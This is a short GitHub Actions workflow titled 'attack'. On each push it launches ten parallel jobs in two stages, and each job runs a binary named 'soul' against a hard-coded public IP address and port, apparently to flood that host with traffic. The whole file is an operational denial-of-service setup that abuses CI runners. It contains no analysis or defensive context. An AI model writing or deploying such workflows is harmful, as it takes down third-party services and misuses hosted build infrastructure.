name: attack
on: [push]

jobs:
  stage-0:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: ./soul 20.204.39.212 29844 10 400

  stage-1:
    needs: stage-0
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: ./soul 20.204.39.212 29844 300 400
